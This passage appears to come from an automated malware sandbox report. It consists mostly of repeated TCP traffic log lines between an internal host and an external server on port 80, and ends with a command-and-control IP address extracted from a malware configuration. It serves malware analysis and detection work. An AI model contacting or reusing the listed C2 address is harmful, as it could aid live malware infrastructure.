            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80

            Networking

            barindex
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: 76.8.53.133
